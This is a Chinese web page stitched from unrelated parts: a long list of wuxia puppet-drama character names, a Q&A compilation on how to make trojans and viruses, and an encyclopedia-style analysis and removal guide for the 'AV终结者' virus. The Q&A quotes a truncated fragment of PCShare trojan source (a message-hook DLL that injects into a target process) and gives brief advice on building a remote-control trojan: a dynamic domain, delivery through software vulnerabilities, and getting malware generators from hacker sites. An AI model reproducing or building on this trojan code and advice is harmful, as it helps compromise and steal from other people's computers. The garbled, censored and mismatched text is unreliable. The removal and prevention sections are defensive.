能人,分不开,白云骄霜,不死魔僧,死路冥神,浑沌风魔,大叹山,小叹灵,四寸灵奴,沐云生,六分刀,照影扣魂,不怍大侠,司马天真,应问天,魔魁,风牙鬼师,魔天斗相,
双龙背,傲笑红尘,一字剑,荆轲无命,专诸无命,豫让无命,酷郎,血灵魔尊,疑云,非常女,飘浪客,骨董,雪鸦,青损损,红帕帕,长心圣佛,长灵圣佛,愁剑孤鹰,风无影刀留残,吒痴,二佰,零散,忽驴,宇文知日,竹藏剑,花藏刀,宇文弓,地老,天荒,半部禅,宇文冰心,宇文弄月,金角战牛,唐龙剑云,命随刀,蟠龙邪尊,情海过客,病兰花,春风,秋雨,惊虹留恨,地灵手,十方灵动,左命老,百字央,玉天玑,曹鹰,曹龙,玉花,山涛君,海殇君,云岫君,亢无后,刑婆,力山,不戒僧,乾儿,末情天,林震天,天山双霸,风雪生,渡金笙,夔神,夔萝,夔婴,雷公婴,龙琴一品,观世局,瑟残影,魔族精卫,劫无形,潇湘子,疯魔乱道,红目枝,归元圣童,血泣噬道,触念来,屠力金,诛形银,杀气铜,长桑鬼陀,变相来,因果来,圣贤诸,上官知礼,广文诸,风雅诸,白阳子,金阳子,墨阳子,夜笑埋道,执道行,蓝蝎哭道,孝文,魔魁之女,天督,地宰,灵啸月,夫子,玉槐相士,秤命客,补运仙,道尊,老佛,太极道君,无极道君,白滴子,鹤岗,鹤原,不知名,玄真君,剑心,剑胆,太真君,元真君,鹤元,百里抱信,南宫布仁,释丹凤,天理老人,风随行,空劫,曹百哀,心残,超天五行者,追音老叟,阴柳双姬,天际双星,勾肠剑,沙罗教主,武宗魁,目残,肢残,智残,蓝带,红彩,天残武祖,乱世狂刀,虎嬷,无难佛,慕容娟,慕容婵,绝崖孤鸠,金蛾人,盼梦圆,怒马疯鬼,九截尸,非凡公子,雪狼,亡命之花,黑暗六鹰,黑狱妖魁,日扬,明月,星河,宗慧,白月,神鹤佐木,菩提学院主,圆觉,青阳子,黑流派大首领,藏剑生,半生浮,玄德相士,一花香,七重冥王,死卜阴帖,苍灵,铁轮王,左慧,右智,千层雪,木苍,降龙罗汉,伏虎罗汉,七大金身,大和居士,长眉圣佛,长臂圣佛,跨限怒佛,秋风之刀,万缕丝,剑君十二恨,紫阳子,血阳子,落日一笑,拒生郎,往世道君,当世道君,来世道君,诛天灭道,雪峰三枭,大宇冰尊,夺命鸳鸯,白条狼,鬼川三枭,龙末九,千面石魔,陆慈心,白发杀佛,黑心泣儒,蓝颜悲道,银羽飞燕,龙喉喊,碧峰剑魅,五雷灯,七阴灯,九元灯,天象大如,人海大如,地藏大如,玉芙蓉,白马雕龙,万烛公,只手,原始火,东方三侠,天池老母,七海游叟,夜慧白庸,乔飞,萧雨,圣阳先知,叶千修,夺命金索,冯衡,宋天德,天镜老者,十方世祖,天外法者,乾坤上人,咸通,四鬼蜮,欢喜佛,泰斗三奇,铜衣道人,铁衣道人,慈海渡者,心弦,火龙婴,竹魂,奇妙大棺王,屁龟,凤裳,殁神,暮鼓,晨钟,沙虫,青丝,血双鳞,一瓢水,呼雷战神,读千经,修罗魔相,泣鬼刀,柳邪风,阴陀螺,麻疯客,尸虫,轰天蛟,万魔天指,宇宙神医,修渡开,白马明珠,天狼堡主,孤愁先生,地灵鬼母,东南秋,金棺,银棺,玉棺,星魂,月魄,无心陀,大悲寺住持,法明,点星笔,八方冥,智多罗,至尊棺,废人,岩十一,鬼地棒,魔天锤,万年茸,红灵芝,闻湘波,刁七爷,阿寓藏,三昧光,五界通,武皇,普开化,帝王根,沙暴极,众天,雪山老妖,神鱼,巴左护,蓝神秘,白神秘,鬼帝,养鬼天忌,十恶鬼婴,魔沼,魔囿,魔台,醉贵妃,金羊,银羊,黑眼鬼,阿鹤,修龙客,澈悟人生,烈阳神,小霸王,鬼王棺,绝情师太,金娃,银童,素续缘,鬼符灯,梅香居士,柳全真,古太虚,巫上玄,九恶道,娑罗七鬼,劫成念,毒炽盛,无我相,尊天印,双运行,法上观,梦杀升,布云广,容正弘,形而上,抑制无极,表象意魔,促音褊邪,赤钹哀音,炉火狭爱,传动怒生,桀黠味毒,执戒律,教世音,残缺暴霸,虿尾恶露,藏原,应无私,精灵四魂,慈航渡,谄佞迷妖,正传,业途灵,泰气弥陀,极元弥陀,耆宿期,晖光德,跃动四象,急追五令,轮转六嫦,傲性七夷,侯贯清,众生见,空妙有,数循环,曲宿全,渡岸舟,千良和,了无音,燕渡关,佛莲,大圆觉,辅天,宿斗老人,地冥至尊,今生一剑,钗头凤,赛迁,沐昭光,腹中首,缺心,太黄君,阴间师,阴冥皇,箭无形,彩绫,花信风,火云姑,哀三声,风采铃,秋分,秋别,寒夜残灯,刀兽,剑禽,骨蚍,彩纹蝶,圣上儒,灯蝶,一页书,冒百然,泣花郎,迷蝶,断罪业,离恶障,百里泣,枭蝶,傲八方,春意厚,唤魂丧,狄萧,雾谷老人,一休禅师,阿修罗主宰,血吻蝶,织梦师,聂天官,诛十七,花非花,金小开,万世因,双面刀鬼,鬼计连环,缺哈多,追影鬼仆,满江红,掩日光,鬼藏智,藏智鬼,智鬼藏,鬼智藏,智藏鬼,藏鬼智,常惠恩,恨今生,半人龙,恶魂暴鬼,竹虚,半邪郎,玩命浪子,花影人,天下第一棺,痴虫,毒王,孔识藏,命七天,半边分,紫束白,关足天,圆流,圆宿薄,渡入迷,崎路人,宫布衣,纱四郎,通瑶池,五方罗刹,呼三叹,八面狼姬,万俟焉,灵心异佛,蓝晶人,枯叶,沙漠五僧,回元三圣,刺发无常,笑面无常,孔飙达,天鹰大帝,天鹰公主,天吊神,何世宗,黑时雨,何三色,金牌大执法,无色佛,欧阳艮,诸葛坤,不死僧,天愁客,百里飞首,符仔仙,修仇休,紫金花,战二郎,一钱一命,五妃,无道教妈,长生佛,五剑雕郎,飞鸿仙子,逐云仙子,孔雀王朝郡主,叶小钗,萧竹盈,金羽兰,金童,银女,望星子,视月能,观日生,一剑万生,一刀万杀,血手魔魁,半月郎君,七狐仙,文武太皇,主席夫人,时空超越人,童颜未老人,半驼废,九指挪吒,绿面金刚,火麒麟,蚕眉金豹,赤眼银葱,沧海圣老,盖天公,普九年,太原古人,白文采,素云流,管千岳,荫尸人,魔姑,鬼叟,尘不染,谈无欲,黑珍珠,仇恨怨止,恩情爱休,无常人,欧阳上智,谈笑眉,怒斩,沙人畏,欧阳翎,一点红,欧阳尚智,敖乙,信天翁,昆仑上人,金少爷,照世明灯,唐飞虹,唐七七,唐飞宇,唐飞鹏,万点神拳,千臂魔君,冠天星,火阳真君,流星君,代行姥姥,太虚子,玄虚子,火云公,了情师太,识悟大师,长眉真人,青竹公,紫冉客,华山一剑,龙凤双侠,鬼智灵童,飞狼,魔灵杀素,万变魔女,蟒中龙,秦假仙,独眼龙,化丑,藏镜人,网中人,黑白郎君,素还真,宇文天,冷剑白狐,一线生,霹雳公,碧眼天枭,半天鹰,金太极,紫霹雳,小金刚,小玄元,欧阳琳,剑藏玄,花风云,恨海主宰,弯月,心海主宰,欲海主宰,怒海主宰,情海主宰,银刀太妹,蜕变妖郎,凤飘飘,绯羽怨姬,断风尘,孟白云,楼无痕,赭杉军,东宫神玺,史波浪,天草二十六,伏婴师
问题一:怎么制作木马程序? 你需要学会编程才能编写木马编写木马最好用vc++。enet/eschool/video/c++/ 这是c++的教程,你学懂了这些皮毛的东西再深入研究内核编程吧如果上面的地址打不开可以到这里pconline/pcedu/empolder/gj/vc/0607/820674
问题二:木马和病毒是怎么做出来的呢? 哈哈木马和病毒都属于执行程序
木马(Trojan)这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的本意是特洛伊的,即代指特洛伊木马,也就是木马计的故事)。
“木马”程序是目前比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种者电脑的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至远程操控被种者的电脑。“木马”与计算机网络中常常要用到的远程控制软件有些相似,但由于远程控制软件是“善意”的控制,因此通常不具有隐蔽性;“木马”则完全相反,木马要达到的是“偷窃”性的远程控制,如果没有很强的隐蔽性的话,那就是“毫无价值”的。
它是指通过一段特定的程序(木马程序)来控制另一台计算机。木马通常有两个可执行程序:一个是客户端,即控制端,另一个是服务端,即被控制端。植入被种者电脑的是“服务器”部分,而所谓的“黑客”正是利用“控制器”进入运行了“服务器”的电脑。运行了木马程序的“服务器”以后,被种者的电脑就会有一个或几个端口被打开,使黑客可以利用这些打开的端口进入电脑系统,安全和个人隐私也就全无保障了! 木马的设计者为了防止木马被发现,而采用多种手段隐藏木马。木马的服务一旦运行并被控制端连接,其控制端将享有服务端的大部分操作权限,例如给计算机增加口令,浏览、移动、复制、删除文件,修改注册表,更改计算机配置等。
随着病毒编写技术的发展,木马程序对用户的威胁越来越大,尤其是一些木马程序采用了极其狡猾的手段来隐蔽自己,使普通用户很难在中毒后发觉。
木马得种类
1 网络游戏木马
随着网络在线游戏的普及和升温,我国拥有规模庞大的网游玩家。网络游戏中的金钱、装备等虚拟财富与现实财富之间的界限越来越模糊。与此同时,以**网游帐号密码为目的的木马病毒也随之发展泛滥起来。
网络游戏木马通常采用记录用户键盘输入、Hook游戏进程API函数等方法获取用户的密码和帐号。窃取到的信息一般通过发送电子邮件或向远程脚本程序提交的方式发送给木马作者。
网络游戏木马的种类和数量,在国产木马病毒中都首屈一指。流行的网络游戏无一不受网游木马的威胁。一款新游戏正式发布后,往往在一到两个星期内,就会有相应的木马程序被制作出来。大量的木马生成器和黑客网站的公开销售也是网游木马泛滥的原因之一。
2 网银木马
网银木马是针对网上交易系统编写的木马病毒,其目的是**用户的卡号、密码,甚至安全证书。此类木马种类数量虽然比不上网游木马,但它的危害更加直接,受害用户的损失更加惨重。
网银木马通常针对性较强,木马作者可能首先对某银行的网上交易系统进行仔细分析,然后针对安全薄弱环节编写病毒程序。如2004年的“网银大盗”病毒,在用户进入工行网银登录页面时,会自动把页面换成安全性能较差、但依然能够运转的老版页面,然后记录用户在此页面上填写的卡号和密码;“网银大盗3”利用招行网银专业版的备份安全证书功能,可以**安全证书;2005年的“新网银大盗”,采用API Hook等技术干扰网银登录安全控件的运行。
随着我国网上交易的普及,受到外来网银木马威胁的用户也在不断增加。
3 即时通讯软件木马
现在,国内即时通讯软件百花齐放。QQ、新浪UC、网易泡泡、盛大圈圈……网上聊天的用户群十分庞大。常见的即时通讯类木马一般有3种:
一、发送消息型。通过即时通讯软件自动发送含有恶意网址的消息,目的在于让收到消息的用户>>
问题三:怎么制作简单木马? 一个简单的vc++60下的木马源码 木马源程序,包括客户端和服务端PCSshare的客户端代码:
#include stdafxh
#include SshWorkh
#pragma data_seg(Shared)
char m_CharFileName[256] = {0};
HHOOK g_hook = NULL;
HHOOK g_khook = NULL;
INITDLLINFO m_InitInfo = {0};
BOOL m_IsOk = FALSE;
#pragma data_seg()
#pragma ment(linker,/section:Shared,rws)
HINSTANCE ghInstance = NULL;
SshWork m_Work;
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
case DLL_PROCESS_ATTACH:
ghInstance = (HINSTANCE) hModule;
break;
default : break;
}
return TRUE;
}
LRESULT WINAPI GetMsgProc(int nCode, WPARAM wParam, LPARAM lParam)
{
LRESULT lResult = CallNextHookEx(g_hook, nCode, wParam, lParam);
查看是否为指定进程
if(!m_IsOk && m_InitInfom_ProcessId == GetCurrentProcessId())
{
找到指定进程取消hook
m_IsOk = TRUE;
if(g_hook) UnhookWindowsHookEx(g_hook);
通知主进程退出
HANDLE m_WaitEvent =
OpenEvent(EVENT_ALL_ACCESS,FALSE,
m_InitInfom_EventName);
if(m_WaitEvent)
{
SetEvent(m_WaitEvent);
CloseHandle(m_WaitEvent);
}
Sleep(1000);
装载DLL到进程
m_Workm_Module = LoadLibrary(m_InitInfom_StartFile);
if(m_Workm_Module)
{
m_WorkStartWork(&m_InitInfo);
}
}
return lResult;
}
BOOL PlayWork(LPINIT>>
问题四:木马病毒怎样制作 上网先学学把,别自己先中毒了,网上就有代码下载的
问题五:怎么制作木马病毒 5分 这是个比较复杂的问题,病毒开发不同于普通应用开发,需要更广泛的和更深入的编成技术 系统底层问题:截取屏幕、Hook鼠标键盘 网络问题:涉及到拦截数据报文,加解密数据 反侦测问题:隐藏进程…………学编程2~3个月,用Delphi之类的软件,一般就可以开发普通应用程序 VC++最多6个月,也能搞出些东西 但要搞病毒木马等,先学3年再考虑。
问题六:怎么做木马? 木马是内行的 但是你做木马 不要涉及财物之类的
**财物就涉及违法了
一般木马中毒都是通过下载软件,浏览未知网页
Trojan一词的特洛伊木马本意是特洛伊的,指特洛伊木马,是木马计的故事
木马会**你的账号,信息等资料
如果电脑中了木马建议尽快杀毒以免造成系统问题
可以先做一次全盘杀毒
然后针对性的:
腾讯电脑管家--工具箱--木马克星 (针对于杀了又出现的顽固病毒)
最后开启实时防毒保护。
问题七:怎么制作简单的木马程序 您好
1,制作木马和使用木马病毒都是违法犯罪的行为,不建议您去学习。
2,制作出木马病毒程序后,这个程序就会自动开始执行,对您的电脑首先开始**帐号木马以及破坏程序。
3,所以如果自己受到了攻击或者盗号,不要用这种方式,要以正当途径来解决。
4,建议您到腾讯电脑管家官网下载一个电脑管家。
5,电脑管家拥有16层实时防护功能和QQ帐号全景防御系统,可以从上网安全、应用入口、系统底层等全方位保护电脑安全不受木马病毒侵袭,而且电脑管家还可以全方位多维度保护账号安全,精确打击盗号木马,瞬时查杀并对风险预警。
如果还有其他疑问和问题,欢迎再次来电脑管家企业平台进行提问,我们将尽全力为您解答疑难
问题八:如何做远程控制的木马? 配置一个动态域名,然后设置客户端,通过漏洞发送,进行远程控制,建议你看看动画教程,以前的灰鸽子什么的是个经典,先把那个研究透了什么都会了
AV终结者”即”帕虫”是一系列反击杀毒软件,破坏系统安全模式、植入木马下载器的病毒,它指的是一批具备如下破坏性的病毒、木马和蠕虫。“AV终结者”名称中的“AV”即为英文“反病毒”(Anti-Virus)的缩写。它能破坏大量的杀毒软件和个人防火墙的正常监控和保护功能,导致用户电脑的安全性能下降,容易受到病毒的侵袭。同时它会下载并运行其他盗号病毒和恶意程序,严重威胁到用户的网络个人财产。此外,它还会造成电脑无法进入安全模式,并可通过可移动磁盘传播。目前该病毒已经衍生多个新变种,有可能在互联网上大范围传播。“AV终结者”设计中最恶毒的一点是,用户即使重装操作系统也无法解决问题:格式化系统盘重装后很容易被再次感染。用户格式化后,只要双击其他盘符,病毒将再次运行。“AV终结者”会使用户电脑的安全防御体系被彻底摧毁,安全性几乎为零。它还自动连接到某网站,下载数百种木马病毒及各类盗号木马、广告木马、风险程序,在用户电脑毫无抵抗力的情况下,鱼贯而来,用户的网银、网游、QQ账号密码以及机密文件都处于极度危险之中。
AV终结者最彻底解决方案
病毒名称:AV终结者
传播方式:内存,windows漏洞
破坏方式:进程插入
生成病毒文件名:随机8位字符
自我保护:应用程序绑架
病毒目的:从网络上下载大量木马
危害等级:★★★★★
近日网络上出现了一种破坏力及强的病毒“AV终结者”,不到一个月时间,变种就已达到数百个之多,波及人群超过十几万人,这个病毒非常变态,一旦感染就很难清楚。
“AV终结者”是由随机8位数字和字母组合而成的病毒,是闪存寄生病毒,它是通过闪存等存储介质或者注入服务器来实现的。
一、什么是“AV终结者”
“AV终结者”病毒运行后会在系统中生成如下几个文件:C:\program files\common files\microsoft shared\msinfo\随机生成病毒名dat、C:\program files\common files\microsoft shared\msinfo\随机生成病毒名dll、C:\windows\随机生成病毒名chm
“AV终结者”的病毒名是由大写字母+数字随机组合而成,其长度为8位,可以说生成同名病毒的概率是很低的。因此即使我们知道了这是病毒生成的文件,也别指望通过病毒名在网络上找到病毒的清楚方法。
“AV终结者”病毒运行后会在本地磁盘和移动磁盘中复制病毒文件和anuoruninf文件,当用户双击盘符时就会激活病毒,即使是重装系统也是无法将病毒彻底清楚的。这是目前很多病毒热衷的传播方法,不少用户也懂得删除病毒生成的anuoruninf文件,但是当我们进入“文件夹选项里”,想显示隐藏文件时,可以发现这里已经被病毒给禁用了。
针对杀毒软件的攻击,是“AV终结者”的特点。病毒会终止大部分的杀毒软件和安全工具的进程。国内绝大多数的杀毒软件和安全工具都被列入了黑名单。当杀毒软件暂时失去作用时,病毒就会乘胜追击,通过一种“映象劫持”技术将杀毒软件彻底打入死牢。
“映象劫持”会在注册表的“HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Exeution Options”位置新建一个以杀毒软件和安全工具程序名称命名的项。建立完毕后,病毒还会在里面建立一个Debugger键,键值为“c:\ progra~1\common~1\micros~1\msinfo\05cc73b2dat”。这样当我们双机运行杀毒软件的主程序时,运行的其实是病毒程序。
为了避免在“任务管理器”中露出破绽,病毒会将自己的进程注入到系统的资源管理器进程explorerexe中,这样我就无法通过“任务管理器”发现病毒的进程了。病毒进程的主要作用是监视系统中的用户操作,例如你想手动清楚病毒,修改注册表,病毒没隔一段时间就会把注册表改回去,让你百费劲。另一个作用是监视IE窗口,发现用户搜索病毒资料时,立即关闭网页。
此外,病毒还会破坏windows防火墙和安全模式,封堵用户的后路。最重要的是,病毒会从网络上下载大量盗号木马,**用户的游戏帐户信息,这也是它的真正目的。
二、彻底清楚“AV终结者”
1、运行“任务管理器”,结束“explorerexe”进程,单击“任务管理器的”文件菜单,选择“新建任务”,输入“regedit”,找到HEKEY-LOCAL-MACHINE\software\microsoft\windows\currentversion\explorer\advanced \folder\hidden\showall,将Checkedvalue的的键值改为“1”。
2、在“regedit”中找到HEKEY-LOCAL-MACHINE\software\microsoft\windows NT\currentversion\image file execution options,将以杀毒软件和安全工具命名的项删除。
3、在“资源管理器”中单击“工具”——“文件夹选项”,切换到“查看”,取消“隐藏受保护的操作系统文件”前面的勾,然后选中“显示所有文件和文件夹”。根据上文中提供的路径删除所有的病毒文件。删除其他分区中的病毒,注意不要双击进入盘符,而要用右键点击进入。
三、预防“AV终结者”
首先,要禁止自动播放功能,并能及时更新系统补丁,尤其是MS06-014和MS07-017这两个补丁。
其次,要限制IFEO的读写权,达到限制病毒通过IFEO劫持杀毒软件的目的。操作方法如下:开始——运行,输入regedit32,找到 HEKEY-LOCAL-MACHINE\software\microsoft\windows NT\currentversion\image file execution options,右击此选项,在弹出的菜单中选择“权限”,然后把administrors用户组和users用户组的权限全部取消即可。最后,要限制 SAFEBOOT的读写权,达到限制“AV终极者”修改或删除Drives,保护安全模式正常运行的目的。操作方法如下:同样是在32位注册表里找到 HKEY-LOCAL-MACHINE\SYSTEM\contorlset001\control\safeboot\network\{4d36e967 -e325-11ce-bfc1-08002be10318}和HKEY-LOCAL-MACHINE\SYSTEM\ currentcontrolset\control\safeboot\minimal\,将administors用户组和users用户组的权限全部取消即可。
[编辑本段]传播途径
“AV终结者”的重要传播途径是U盘等移动存储介质。它通过U盘、移动硬盘的自动播放功能传播,建议用户暂时关闭电脑的这一功能。用户近期一定要注意U盘使用安全,不要在可疑电脑上使用U盘,以免自己的电脑受到传染。
[编辑本段]病毒特征
这种病毒主要特征有:禁用所有杀毒软件以及相关安全工具,让用户电脑失去安全保障;致使用户根本无法进入安全模式清除病毒;强行关闭带有病毒字样的网页,只要在网页中输入‘病毒’相关字样,网页遂被强行关闭,即使是一些安全论坛也无法登陆,用户无法通过网络寻求解决办法。
[编辑本段]病毒现象
·1 生成很多8位数字或字母随机命名的病毒程序文件,并在电脑开机时自动运行。
·2 绑架安全软件,中毒后会发现几乎所有杀毒软件,系统管理工具,反间谍软件不能正常启动。即使手动删除了病毒程序,下次启动这些软件时,还会报错。
·3 不能正常显示隐藏文件,其目的是更好的隐藏自身不被发现。
·4 禁用windows自动更新和Windows防火墙,这样木马下载器工作时,就不会有任何提示窗口弹出来。为该病毒的下一步破坏打开方便之门。
·5 破坏系统安全模式,使得用户不能启动系统到安全模式来维护和修复。
·6 当前活动窗口中有杀毒、安全、社区相关的关键字时,病毒会关闭这些窗口。假如你想通过浏览器搜索有关病毒的关键字,浏览器窗口会自动关闭。
·7 在本地硬盘、U盘或移动硬盘生成autoruninf和相应的病毒程序文件,通过自动播放功能进行传播。这里要注意的是,很多用户格式化系统分区后重装,访问其它磁盘,立即再次中毒,用户会感觉这病毒格式化也不管用。
·8 病毒程序的最终目的是下载更多木马、后门程序。用户最后受损失的情况取决于这些木马和后门程序。
·9病毒运行后,鼠标右击菜单以及下拉菜单选项,会在1到两秒钟时间后,自动选择最后一个选项,不过可以使用快捷方式组合。
[编辑本段]防范措施
对于病毒而言,良好的防范措施,好过中毒之后再绞尽脑汁去寻找查杀方法,而且一旦感染该病毒,清除过程相当复杂,因此,在采访中,金山、江民、瑞星等几家公司的反病毒专家们向记者提供了针对该病毒防范措施:
1保管好自己的U盘,MP3、移动硬盘等移动储存的使用,当外来U盘接入电脑时,请先不要急于双击打开,一定要先经过杀毒处理,建议采用具有U盘病毒免疫功能的杀毒软件,如KV2007 独有的U盘盾技术,可以免疫所有U盘病毒通过双击U盘时运行。
2 给系统打好补丁程序,尤其是MS06-014和MS07-17这两个补丁,目前绝大部分的网页木马都是通过这两个漏洞入侵到计算机里面的。
3 即时更新杀毒软件病毒库,做到定时升级,定时杀毒。
4安装软件要到正规网站下载,避免软件安装包被捆绑进木马病毒。
5关闭windows的自动播放功能。
[编辑本段]病毒解决方案
方法一:
因为这个病毒会攻击杀毒软件,已经中毒的电脑杀毒软件没法正常启动,双击没反应,因而这时无法用杀毒软件来清除;利用手动解决也相当困难,并且,AV终结者是一批病毒,不能简单的通过分析报告来人工删除。推荐的清除步骤如下:
1 在能正常上网的电脑上到http://zhuanshadubanet/259shtml 下载AV终结者病毒专杀工具。
2 在正常的电脑上禁止自动播放功能,以避免通过插入U盘或移动硬盘而被病毒感染。禁止方法参考方案附件:
把AV终结者专杀工具从正常的电脑复制到U盘或移动硬盘上,然后再复制到中毒的电脑上。
3 执行AV终结者专杀工具,清除已知的病毒,修复被破坏的系统配置。
(注:AV终结者专杀工具的重要功能是修复被破坏的系统,包括修复映像劫持;修复被破坏的安全模式;修复隐藏文件夹的正常显示和删除各磁盘分区的自动播放配置。)
4 不要立即重启电脑,然后启动杀毒软件,升级病毒库,进行全盘扫描。以清除木马下载器下载的其它病毒。
方法二:
去黑联盟或黑客动画吧,下载一个AV生成器,运行后(注意别单击生成),选“卸载本地服务端”。
[编辑本段]手动清除办法
1到网上下载IceSword工具,并将该工具改名,如改成abcexe 名称,这样就可以突破病毒进程对该工具的屏蔽。然后双击打开IceSword工具,结束一个8位数字的EXE文件的进程,有时可能无该进程。
2利用IceSword的文件管理功能,展开到C:\Program Files\Common Files\Microsoft Shared\MSINFO\下,删除2个8位随机数字的文件,其扩展名分别为:dat 和dll 。再到%windir%\help\目录下,删除同名的hlp或者同名的chm文件,该文件为系统帮助文件图标。
3 然后到各个硬盘根目录下面删除Autoruninf 文件和可疑的8位数字文件,注意,不要直接双击打开各个硬盘分区,而应该利用Windows资源管理器左边的树状目录来浏览。有时电脑中毒后可能无法查看隐藏文件,这时可以利用WinRar软件的文件管理功能来浏览文件和进行删除操作。
4利用IceSword的注册表管理功能,展开注册表项到:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options],删除里面的IFEO劫持项。
当完成以上操作之后,就可以安装或打开杀毒软件了,然后升级杀毒软件到最新的病毒库,对电脑进行全盘杀毒。(手动清除办法由江民反病毒专家提供